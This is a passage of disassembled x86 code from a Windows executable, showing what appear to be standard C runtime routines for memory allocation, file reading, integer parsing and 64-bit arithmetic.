sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_416BAA
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_416B90 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416BCD proc near ; CODE XREF: sub_401E97+46�p
; sub_401F0F+67�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_4]
push esi
mov esi, [ebp+arg_0]
mov [ebp+var_1C], eax
push edi
lea eax, [ebp+arg_C]
push eax
push [ebp+arg_8]
lea eax, [ebp+var_20]
push eax
mov [ebp+var_14], 42h
mov [ebp+var_18], esi
mov [ebp+var_20], esi
call sub_418A1C
add esp, 0Ch
test esi, esi
mov edi, eax
jz short loc_416C1E
dec [ebp+var_1C]
js short loc_416C11
mov eax, [ebp+var_20]
and byte ptr [eax], 0
jmp short loc_416C1E
; ---------------------------------------------------------------------------
loc_416C11: ; CODE XREF: sub_416BCD+3A�j
lea eax, [ebp+var_20]
push eax
push 0
call sub_418875
pop ecx
pop ecx
loc_416C1E: ; CODE XREF: sub_416BCD+35�j
; sub_416BCD+42�j
mov eax, edi
pop edi
pop esi
leave
retn
sub_416BCD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416C24 proc near ; CODE XREF: sub_401F83+19�p
; sub_405D17+1C�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_4]
push esi
mov esi, [ebp+arg_0]
push edi
push [ebp+arg_C]
mov [ebp+var_1C], eax
push [ebp+arg_8]
lea eax, [ebp+var_20]
push eax
mov [ebp+var_14], 42h
mov [ebp+var_18], esi
mov [ebp+var_20], esi
call sub_418A1C
add esp, 0Ch
test esi, esi
mov edi, eax
jz short loc_416C74
dec [ebp+var_1C]
js short loc_416C67
mov eax, [ebp+var_20]
and byte ptr [eax], 0
jmp short loc_416C74
; ---------------------------------------------------------------------------
loc_416C67: ; CODE XREF: sub_416C24+39�j
lea eax, [ebp+var_20]
push eax
push 0
call sub_418875
pop ecx
pop ecx
loc_416C74: ; CODE XREF: sub_416C24+34�j
; sub_416C24+41�j
mov eax, edi
pop edi
pop esi
leave
retn
sub_416C24 endp
; =============== S U B R O U T I N E =======================================
sub_416C7A proc near ; CODE XREF: sub_416D02�j
; sub_4202EF+36�p
arg_0 = dword ptr 4
push esi
push edi
call sub_4191CF
mov edi, [eax+64h]
cmp edi, off_4323FC
jz short loc_416C93
call sub_419FFE
mov edi, eax
loc_416C93: ; CODE XREF: sub_416C7A+10�j
mov esi, [esp+8+arg_0]
loc_416C97: ; CODE XREF: sub_416C7A+43�j
cmp dword ptr [edi+28h], 1
movzx eax, byte ptr [esi]
jle short loc_416CAE
push 8
push eax
push edi
call sub_419DFB
add esp, 0Ch
jmp short loc_416CB8
; ---------------------------------------------------------------------------
loc_416CAE: ; CODE XREF: sub_416C7A+24�j
mov ecx, [edi+48h]
movzx eax, byte ptr [ecx+eax*2]
and eax, 8
loc_416CB8: ; CODE XREF: sub_416C7A+32�j
test eax, eax
jz short loc_416CBF
inc esi
jmp short loc_416C97
; ---------------------------------------------------------------------------
loc_416CBF: ; CODE XREF: sub_416C7A+40�j
movzx ecx, byte ptr [esi]
inc esi
cmp ecx, 2Dh
mov edx, ecx
jz short loc_416CCF
cmp ecx, 2Bh
jnz short loc_416CD3
loc_416CCF: ; CODE XREF: sub_416C7A+4E�j
movzx ecx, byte ptr [esi]
inc esi
loc_416CD3: ; CODE XREF: sub_416C7A+53�j
xor eax, eax
loc_416CD5: ; CODE XREF: sub_416C7A+7C�j
cmp ecx, 30h
jl short loc_416CE4
cmp ecx, 39h
jg short loc_416CE4
sub ecx, 30h
jmp short loc_416CE7
; ---------------------------------------------------------------------------
loc_416CE4: ; CODE XREF: sub_416C7A+5E�j
; sub_416C7A+63�j
or ecx, 0FFFFFFFFh
loc_416CE7: ; CODE XREF: sub_416C7A+68�j
cmp ecx, 0FFFFFFFFh
jz short loc_416CF8
lea eax, [eax+eax*4]
lea eax, [ecx+eax*2]
movzx ecx, byte ptr [esi]
inc esi
jmp short loc_416CD5
; ---------------------------------------------------------------------------
loc_416CF8: ; CODE XREF: sub_416C7A+70�j
cmp edx, 2Dh
pop edi
pop esi
jnz short locret_416D01
neg eax
locret_416D01: ; CODE XREF: sub_416C7A+83�j
retn
sub_416C7A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416D02 proc near ; CODE XREF: sub_402021+63�p
; sub_402B47+12�p ...
jmp sub_416C7A
sub_416D02 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416D07 proc near ; CODE XREF: sub_402402+1C2�p
; sub_402402+1C8�p ...
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 00416D63 SIZE 00000015 BYTES
push 0Ch
push offset stru_42BDD0
call __SEH_prolog
mov esi, [ebp+arg_0]
test esi, esi
jz short loc_416D72
cmp dword_482984, 3
jnz short loc_416D63
push 4
call sub_41A1D6
pop ecx
and [ebp+ms_exc.disabled], 0
push esi
call sub_41A24F
pop ecx
mov [ebp+var_1C], eax
test eax, eax
jz short loc_416D46
push esi
push eax
call sub_41A27A
pop ecx
pop ecx
loc_416D46: ; CODE XREF: sub_416D07+34�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_416D5A
cmp [ebp+var_1C], 0
jnz short loc_416D72
push [ebp+arg_0]
jmp short loc_416D64
sub_416D07 endp
; =============== S U B R O U T I N E =======================================
sub_416D5A proc near ; CODE XREF: sub_416D07+43�p
; DATA XREF: .text:stru_42BDD0�o
push 4
call sub_41A142
pop ecx
retn
sub_416D5A endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_416D07
loc_416D63: ; CODE XREF: sub_416D07+1A�j
push esi
loc_416D64: ; CODE XREF: sub_416D07+51�j
push 0
push dword_482980
call dword_422058 ; RtlFreeHeap
loc_416D72: ; CODE XREF: sub_416D07+11�j
; sub_416D07+4C�j
call __SEH_epilog
retn
; END OF FUNCTION CHUNK FOR sub_416D07
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416D78 proc near ; CODE XREF: sub_416DF3+B�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 0Ch
push offset stru_42BDE0
call __SEH_prolog
mov esi, [ebp+arg_0]
cmp dword_482984, 3
jnz short loc_416DBE
cmp esi, dword_482970
ja short loc_416DBE
push 4
call sub_41A1D6
pop ecx
and [ebp+ms_exc.disabled], 0
push esi
call sub_41AA2E
pop ecx
mov [ebp+var_1C], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_416DEA
mov eax, [ebp+var_1C]
test eax, eax
jnz short loc_416DE1
loc_416DBE: ; CODE XREF: sub_416D78+16�j
; sub_416D78+1E�j
test esi, esi
jnz short loc_416DC3
inc esi
loc_416DC3: ; CODE XREF: sub_416D78+48�j
cmp dword_482984, 1
jz short loc_416DD2
add esi, 0Fh
and esi, 0FFFFFFF0h
loc_416DD2: ; CODE XREF: sub_416D78+52�j
push esi
push 0
push dword_482980
call dword_42205C ; RtlAllocateHeap
loc_416DE1: ; CODE XREF: sub_416D78+44�j
call __SEH_epilog
retn
sub_416D78 endp
; =============== S U B R O U T I N E =======================================
sub_416DE7 proc near ; DATA XREF: .text:stru_42BDE0�o
mov esi, [ebp+8]
sub_416DE7 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_416DEA proc near ; CODE XREF: sub_416D78+3A�p
push 4
call sub_41A142
pop ecx
retn
sub_416DEA endp
; =============== S U B R O U T I N E =======================================
sub_416DF3 proc near ; CODE XREF: sub_416E1F+A�p
; sub_4179EC+6�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0FFFFFFE0h
ja short loc_416E1C
loc_416DFA: ; CODE XREF: sub_416DF3+27�j
push [esp+arg_0]
call sub_416D78
test eax, eax
pop ecx
jnz short locret_416E1E
cmp [esp+arg_4], eax
jz short locret_416E1E
push [esp+arg_0]
call sub_41AD78
test eax, eax
pop ecx
jnz short loc_416DFA
loc_416E1C: ; CODE XREF: sub_416DF3+5�j
xor eax, eax
locret_416E1E: ; CODE XREF: sub_416DF3+13�j
; sub_416DF3+19�j
retn
sub_416DF3 endp
; =============== S U B R O U T I N E =======================================
sub_416E1F proc near ; CODE XREF: sub_402402+B1�p
; sub_402402+C1�p ...
arg_0 = dword ptr 4
push dword_481334
push [esp+4+arg_0]
call sub_416DF3
pop ecx
pop ecx
retn
sub_416E1F endp
; =============== S U B R O U T I N E =======================================
sub_416E31 proc near ; CODE XREF: sub_416E7D+32�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
or edi, 0FFFFFFFFh
test byte ptr [esi+0Ch], 83h
jz short loc_416E74
push esi
call sub_41AEDC
push esi
mov edi, eax
call sub_41AEB1
push dword ptr [esi+10h]
call sub_41AE16
add esp, 0Ch
test eax, eax
jge short loc_416E62
or edi, 0FFFFFFFFh
jmp short loc_416E74
; ---------------------------------------------------------------------------
loc_416E62: ; CODE XREF: sub_416E31+2A�j
mov eax, [esi+1Ch]
test eax, eax
jz short loc_416E74
push eax
call sub_416D07
and dword ptr [esi+1Ch], 0
pop ecx
loc_416E74: ; CODE XREF: sub_416E31+D�j
; sub_416E31+2F�j ...
and dword ptr [esi+0Ch], 0
mov eax, edi
pop edi
pop esi
retn
sub_416E31 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416E7D proc near ; CODE XREF: sub_404210+74�p
; sub_405E13+B5�p ...
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 0Ch
push offset stru_42BDF0
call __SEH_prolog
or [ebp+var_1C], 0FFFFFFFFh
mov esi, [ebp+arg_0]
test byte ptr [esi+0Ch], 40h
jz short loc_416EA3
and dword ptr [esi+0Ch], 0
loc_416E9A: ; CODE XREF: sub_416E7D+44�j
mov eax, [ebp+var_1C]
call __SEH_epilog
retn
; ---------------------------------------------------------------------------
loc_416EA3: ; CODE XREF: sub_416E7D+17�j
push esi
call sub_41B102
pop ecx
and [ebp+ms_exc.disabled], 0
push esi
call sub_416E31
pop ecx
mov [ebp+var_1C], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_416EC6
jmp short loc_416E9A
sub_416E7D endp
; =============== S U B R O U T I N E =======================================
sub_416EC3 proc near ; DATA XREF: .text:stru_42BDF0�o
mov esi, [ebp+8]
sub_416EC3 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_416EC6 proc near ; CODE XREF: sub_416E7D+3F�p
push esi
call sub_41B154
pop ecx
retn
sub_416EC6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416ECE proc near ; CODE XREF: sub_416FB7+25�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
mov ebx, [ebp+arg_0]
push edi
mov edi, [ebp+arg_4]
imul edi, [ebp+arg_8]
test edi, edi
mov ecx, edi
mov [ebp+var_8], edi
mov [ebp+arg_0], ecx
jnz short loc_416EF2
xor eax, eax
jmp loc_416F9D
; ---------------------------------------------------------------------------
loc_416EF2: ; CODE XREF: sub_416ECE+1B�j
push esi
mov esi, [ebp+arg_C]
test word ptr [esi+0Ch], 10Ch
jz short loc_416F06
mov eax, [esi+18h]
mov [ebp+var_4], eax
jmp short loc_416F12
; ---------------------------------------------------------------------------
loc_416F06: ; CODE XREF: sub_416ECE+2E�j
mov [ebp+var_4], 1000h
jmp short loc_416F12
; ---------------------------------------------------------------------------
loc_416F0F: ; CODE XREF: sub_416ECE+C5�j
mov ecx, [ebp+arg_0]
loc_416F12: ; CODE XREF: sub_416ECE+36�j
; sub_416ECE+3F�j
test word ptr [esi+0Ch], 10Ch
jz short loc_416F44
mov eax, [esi+4]
test eax, eax
jz short loc_416F44
cmp ecx, eax
mov edi, ecx
jb short loc_416F29
mov edi, eax
loc_416F29: ; CODE XREF: sub_416ECE+57�j
push edi
push dword ptr [esi]
push ebx
call sub_41B500
sub [ebp+arg_0], edi
sub [esi+4], edi
add [esi], edi
add esp, 0Ch
add ebx, edi
mov edi, [ebp+var_8]
jmp short loc_416F8F
; ---------------------------------------------------------------------------
loc_416F44: ; CODE XREF: sub_416ECE+4A�j
; sub_416ECE+51�j
cmp ecx, [ebp+var_4]
jb short loc_416F77
cmp [ebp+var_4], 0
mov eax, ecx
jz short loc_416F5A
xor edx, edx
div [ebp+var_4]
mov eax, ecx
sub eax, edx
loc_416F5A: ; CODE XREF: sub_416ECE+81�j
push eax
push ebx
push dword ptr [esi+10h]
call sub_41B454
add esp, 0Ch
test eax, eax
jz short loc_416FA1
cmp eax, 0FFFFFFFFh
jz short loc_416FB1
sub [ebp+arg_0], eax
add ebx, eax
jmp short loc_416F8F
; ---------------------------------------------------------------------------
loc_416F77: ; CODE XREF: sub_416ECE+79�j
push esi
call sub_41B1A6
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_416FA5
mov [ebx], al
mov eax, [esi+18h]
inc ebx
dec [ebp+arg_0]
mov [ebp+var_4], eax
loc_416F8F: ; CODE XREF: sub_416ECE+74�j
; sub_416ECE+A7�j
cmp [ebp+arg_0], 0
jnz loc_416F0F
mov eax, [ebp+arg_8]
loc_416F9C: ; CODE XREF: sub_416ECE+E1�j
pop esi
loc_416F9D: ; CODE XREF: sub_416ECE+1F�j
pop edi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_416FA1: ; CODE XREF: sub_416ECE+9B�j
or dword ptr [esi+0Ch], 10h
loc_416FA5: ; CODE XREF: sub_416ECE+B3�j
; sub_416ECE+E7�j
mov eax, edi
sub eax, [ebp+arg_0]
xor edx, edx
div [ebp+arg_4]
jmp short loc_416F9C
; ---------------------------------------------------------------------------
loc_416FB1: ; CODE XREF: sub_416ECE+A0�j
or dword ptr [esi+0Ch], 20h
jmp short loc_416FA5
sub_416ECE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416FB7 proc near ; CODE XREF: sub_404210+47�p
; sub_41326A+2F2�p ...
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push 0Ch
push offset stru_42BE00
call __SEH_prolog
push [ebp+arg_C]
call sub_41B102
pop ecx
and [ebp+ms_exc.disabled], 0
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_416ECE
add esp, 10h
mov [ebp+var_1C], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_416FF9
mov eax, [ebp+var_1C]
call __SEH_epilog
retn
sub_416FB7 endp
; =============== S U B R O U T I N E =======================================
sub_416FF9 proc near ; CODE XREF: sub_416FB7+34�p
; DATA XREF: .text:stru_42BE00�o
push dword ptr [ebp+14h]
call sub_41B154
pop ecx
retn
sub_416FF9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417003 proc near ; CODE XREF: sub_41D56C+34�p
; sub_41D56C+49�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 00417174 SIZE 0000003C BYTES
push 14h
push offset stru_42BE10
call __SEH_prolog
mov edi, [ebp+arg_0]
xor ebx, ebx
cmp edi, ebx
jnz short loc_417026
push [ebp+arg_4]
call sub_416E1F
pop ecx
jmp loc_4171AA
; ---------------------------------------------------------------------------
loc_417026: ; CODE XREF: sub_417003+13�j
mov esi, [ebp+arg_4]
cmp esi, ebx
jnz short loc_417039
push edi
call sub_416D07
pop ecx
jmp loc_4171A8
; ---------------------------------------------------------------------------
loc_417039: ; CODE XREF: sub_417003+28�j
cmp dword_482984, 3
jnz loc_417174
loc_417046: ; CODE XREF: sub_417003+158�j
mov [ebp+var_1C], ebx
cmp esi, 0FFFFFFE0h
ja loc_417143
push 4
call sub_41A1D6
pop ecx
mov [ebp+ms_exc.disabled], ebx
push edi
call sub_41A24F
pop ecx
mov [ebp+var_20], eax
cmp eax, ebx
jz loc_417113
cmp esi, dword_482970
ja short loc_4170C3
push esi
push edi
push eax
call sub_41A74F
add esp, 0Ch
test eax, eax
jz short loc_41708B
mov [ebp+var_1C], edi
jmp short loc_4170C3
; ---------------------------------------------------------------------------
loc_41708B: ; CODE XREF: sub_417003+81�j
push esi
call sub_41AA2E
pop ecx
mov [ebp+var_1C], eax
cmp eax, ebx
jz short loc_4170C3
mov eax, [edi-4]
dec eax
mov [ebp+var_24], eax
cmp eax, esi
jb short loc_4170A6
mov eax, esi
loc_4170A6: ; CODE XREF: sub_417003+9F�j
push eax
push edi
push [ebp+var_1C]
call sub_41B500
push edi
call sub_41A24F
mov [ebp+var_20], eax
push edi
push eax
call sub_41A27A
add esp, 18h
loc_4170C3: ; CODE XREF: sub_417003+72�j
; sub_417003+86�j ...
cmp [ebp+var_1C], ebx
jnz short loc_417113
cmp esi, ebx
jnz short loc_4170D2
xor esi, esi
inc esi
mov [ebp+arg_4], esi
loc_4170D2: ; CODE XREF: sub_417003+C7�j
add esi, 0Fh
and esi, 0FFFFFFF0h
mov [ebp+arg_4], esi
push esi
push ebx
push dword_482980
call dword_42205C ; RtlAllocateHeap
mov [ebp+var_1C], eax
cmp eax, ebx
jz short loc_417113
mov eax, [edi-4]
dec eax
mov [ebp+var_24], eax
cmp eax, esi
jb short loc_4170FD
mov eax, esi
loc_4170FD: ; CODE XREF: sub_417003+F6�j
push eax
push edi
push [ebp+var_1C]
call sub_41B500
push edi
push [ebp+var_20]
call sub_41A27A
add esp, 14h
loc_417113: ; CODE XREF: sub_417003+66�j
; sub_417003+C3�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41716B
cmp [ebp+var_20], ebx
jnz short loc_417143
cmp esi, ebx
jnz short loc_417128
xor esi, esi
inc esi
loc_417128: ; CODE XREF: sub_417003+120�j
add esi, 0Fh
and esi, 0FFFFFFF0h
mov [ebp+arg_4], esi
push esi
push edi
push ebx
push dword_482980
call dword_42215C ; RtlReAllocateHeap
mov [ebp+var_1C], eax
loc_417143: ; CODE XREF: sub_417003+49�j
; sub_417003+11C�j
mov eax, [ebp+var_1C]
cmp eax, ebx
jnz short loc_4171AA
cmp dword_481334, ebx
jz short loc_4171AA
push esi
call sub_41AD78
pop ecx
test eax, eax
jnz loc_417046
jmp short loc_4171A8
sub_417003 endp
; =============== S U B R O U T I N E =======================================
sub_417163 proc near ; DATA XREF: .text:stru_42BE10�o
xor ebx, ebx
mov esi, [ebp+0Ch]
mov edi, [ebp+8]
sub_417163 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41716B proc near ; CODE XREF: sub_417003+114�p
push 4
call sub_41A142
pop ecx
retn
sub_41716B endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_417003
loc_417174: ; CODE XREF: sub_417003+3D�j
; sub_417003+1A3�j
xor eax, eax
cmp esi, 0FFFFFFE0h
ja short loc_417191
cmp esi, ebx
jnz short loc_417182
xor esi, esi
inc esi
loc_417182: ; CODE XREF: sub_417003+17A�j
push esi
push edi
push ebx
push dword_482980
call dword_42215C ; RtlReAllocateHeap
loc_417191: ; CODE XREF: sub_417003+176�j
cmp eax, ebx
jnz short loc_4171AA
cmp dword_481334, ebx
jz short loc_4171AA
push esi
call sub_41AD78
pop ecx
test eax, eax
jnz short loc_417174
loc_4171A8: ; CODE XREF: sub_417003+31�j
; sub_417003+15E�j
xor eax, eax
loc_4171AA: ; CODE XREF: sub_417003+1E�j
; sub_417003+145�j ...
call __SEH_epilog
retn
; END OF FUNCTION CHUNK FOR sub_417003
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4171B0 proc near ; CODE XREF: sub_41720C+A�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push 10h
push offset stru_42BE20
call __SEH_prolog
call sub_41BA2A
mov [ebp+var_1C], eax
test eax, eax
jnz short loc_4171D7
call sub_41B9A5
mov dword ptr [eax], 18h
xor eax, eax
jmp short loc_4171FC
; ---------------------------------------------------------------------------
loc_4171D7: ; CODE XREF: sub_4171B0+16�j
and [ebp+ms_exc.disabled], 0
push eax
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41B83D
add esp, 10h
mov [ebp+var_20], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_417202
mov eax, [ebp+var_20]
loc_4171FC: ; CODE XREF: sub_4171B0+25�j
call __SEH_epilog
retn
sub_4171B0 endp
; =============== S U B R O U T I N E =======================================
sub_417202 proc near ; CODE XREF: sub_4171B0+44�p
; DATA XREF: .text:stru_42BE20�o
push dword ptr [ebp-1Ch]
call sub_41B154
pop ecx
retn
sub_417202 endp
; =============== S U B R O U T I N E =======================================
sub_41720C proc near ; CODE XREF: sub_404210+2A�p
; sub_405E13+78�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push 40h
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_4171B0
add esp, 0Ch
retn
sub_41720C endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_417220 proc near ; CODE XREF: sub_402858+18D�p
; sub_41267A+114�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
mov eax, [esp+arg_4]
mov ecx, [esp+arg_C]
or ecx, eax
mov ecx, [esp+arg_8]
jnz short loc_417239
mov eax, [esp+arg_0]
mul ecx
retn 10h
; ---------------------------------------------------------------------------
loc_417239: ; CODE XREF: sub_417220+E�j
push ebx
mul ecx
mov ebx, eax
mov eax, [esp+4+arg_0]
mul [esp+4+arg_C]
add ebx, eax
mov eax, [esp+4+arg_0]
mul ecx
add edx, ebx
pop ebx
retn 10h
sub_417220 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_417255 proc near ; CODE XREF: sub_41728D�p
mov eax, offset sub_41BF0E
mov off_432A48, eax
mov off_432A4C, offset sub_41BB88
mov off_432A50, offset sub_41BBED
mov off_432A54, offset sub_41BB4C
mov off_432A58, offset sub_41BBD3
mov off_432A5C, eax
retn
sub_417255 endp
; =============== S U B R O U T I N E =======================================
sub_41728D proc near ; CODE XREF: sub_4182EB+9�p
; DATA XREF: .text:off_432358�o
call sub_417255
call sub_41BFB1
mov dword_48117C, eax
call sub_41BF5F
fnclex
retn
sub_41728D endp
; =============== S U B R O U T I N E =======================================
sub_4172A4 proc near ; CODE XREF: sub_40318A+8�p
; sub_415F00+FE�p
arg_0 = dword ptr 4
arg_4 = byte ptr 8
push [esp+arg_0]
call dword_4220A0 ; GetFileAttributesA
cmp eax, 0FFFFFFFFh
jnz short loc_4172C4
call dword_422008 ; RtlGetLastWin32Error
push eax
call sub_41B9B7
pop ecx
loc_4172C0: ; CODE XREF: sub_4172A4+41�j
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_4172C4: ; CODE XREF: sub_4172A4+D�j
test al, 1
jz short loc_4172E7
test [esp+arg_4], 2
jz short loc_4172E7
call sub_41B9A5
mov dword ptr [eax], 0Dh
call sub_41B9AE
mov dword ptr [eax], 5
jmp short loc_4172C0
; ---------------------------------------------------------------------------
loc_4172E7: ; CODE XREF: sub_4172A4+22�j
; sub_4172A4+29�j
xor eax, eax
retn
sub_4172A4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4172F0 proc near ; CODE XREF: sub_4031A4+2A�p
; sub_418A1C+60D�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push esi
mov eax, [esp+4+arg_C]
or eax, eax
jnz short loc_417321
mov ecx, [esp+4+arg_8]
mov eax, [esp+4+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+4+arg_0]
div ecx
mov esi, eax
mov eax, ebx
mul [esp+4+arg_8]
mov ecx, eax
mov eax, esi
mul [esp+4+arg_8]
add edx, ecx
jmp short loc_417368
; ---------------------------------------------------------------------------
loc_417321: ; CODE XREF: sub_4172F0+7�j
mov ecx, eax
mov ebx, [esp+4+arg_8]
mov edx, [esp+4+arg_4]
mov eax, [esp+4+arg_0]
loc_41732F: ; CODE XREF: sub_4172F0+49�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_41732F
div ebx
mov esi, eax
mul [esp+4+arg_C]
mov ecx, eax
mov eax, [esp+4+arg_8]
mul esi
add edx, ecx
jb short loc_41735D
cmp edx, [esp+4+arg_4]
ja short loc_41735D
jb short loc_417366
cmp eax, [esp+4+arg_0]
jbe short loc_417366
loc_41735D: ; CODE XREF: sub_4172F0+5D�j
; sub_4172F0+63�j
dec esi
sub eax, [esp+4+arg_8]
sbb edx, [esp+4+arg_C]
loc_417366: ; CODE XREF: sub_4172F0+65�j
; sub_4172F0+6B�j
xor ebx, ebx
loc_417368: ; CODE XREF: sub_4172F0+2F�j
sub eax, [esp+4+arg_0]
sbb edx, [esp+4+arg_4]
neg edx
neg eax
sbb edx, 0
mov ecx, edx
mov edx, ebx
mov ebx, ecx
mov ecx, eax
mov eax, esi
pop esi
retn 10h
sub_4172F0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_417390 proc near ; CODE XREF: sub_4032A8+5F�p
; sub_4032A8+90�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push edi
push esi
push ebx
xor edi, edi
mov eax, [esp+0Ch+arg_4]
or eax, eax
jge short loc_4173B1
inc edi
mov edx, [esp+0Ch+arg_0]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_4], eax
mov [esp+0Ch+arg_0], edx
loc_4173B1: ; CODE XREF: sub_417390+B�j
mov eax, [esp+0Ch+arg_C]
or eax, eax
jge short loc_4173CD
inc edi
mov edx, [esp+0Ch+arg_8]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_C], eax
mov [esp+0Ch+arg_8], edx
loc_4173CD: ; CODE XREF: sub_417390+27�j
or eax, eax
jnz short loc_4173E9
mov ecx, [esp+0Ch+arg_8]
mov eax, [esp+0Ch+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+0Ch+arg_0]
div ecx
mov edx, ebx
jmp short loc_41742A
; ---------------------------------------------------------------------------
loc_4173E9: ; CODE XREF: sub_417390+3F�j
mov ebx, eax
mov ecx, [esp+0Ch+arg_8]
mov edx, [esp+0Ch+arg_4]
mov eax, [esp+0Ch+arg_0]
loc_4173F7: ; CODE XREF: sub_417390+71�j
shr ebx, 1
rcr ecx, 1
shr edx, 1
rcr eax, 1
or ebx, ebx
jnz short loc_4173F7
div ecx
mov esi, eax
mul [esp+0Ch+arg_C]
mov ecx, eax
mov eax, [esp+0Ch+arg_8]
mul esi
add edx, ecx
jb short loc_417425
cmp edx, [esp+0Ch+arg_4]
ja short loc_417425
jb short loc_417426
cmp eax, [esp+0Ch+arg_0]
jbe short loc_417426
loc_417425: ; CODE XREF: sub_417390+85�j
; sub_417390+8B�j
dec esi
loc_417426: ; CODE XREF: sub_417390+8D�j
; sub_417390+93�j
xor edx, edx
mov eax, esi
loc_41742A: ; CODE XREF: sub_417390+57�j
dec edi
jnz short loc_417434
neg edx
neg eax
sbb edx, 0
loc_417434: ; CODE XREF: sub_417390+9B�j
pop ebx
pop esi
pop edi
retn 10h
sub_417390 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_417440 proc near ; CODE XREF: sub_403852+C6�p
; sub_403852+133�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
push edi
push ebx
push esi
mov dl, [ecx]
mov edi, [esp+0Ch+arg_0]
test dl, dl
jz short loc_4174C0
mov dh, [ecx+1]
test dh, dh
jz short loc_4174AD
loc_417458: ; CODE XREF: sub_417440+58�j
; sub_417440+6B�j
mov esi, edi
mov ecx, [esp+0Ch+arg_4]
mov al, [edi]
add esi, 1
cmp al, dl
jz short loc_41747E
test al, al
jz short loc_417478
loc_41746B: ; CODE XREF: sub_417440+36�j
mov al, [esi]
add esi, 1
loc_417470: ; CODE XREF: sub_417440+45�j
cmp al, dl
jz short loc_41747E
test al, al
jnz short loc_41746B
loc_417478: ; CODE XREF: sub_417440+29�j
pop esi
pop ebx
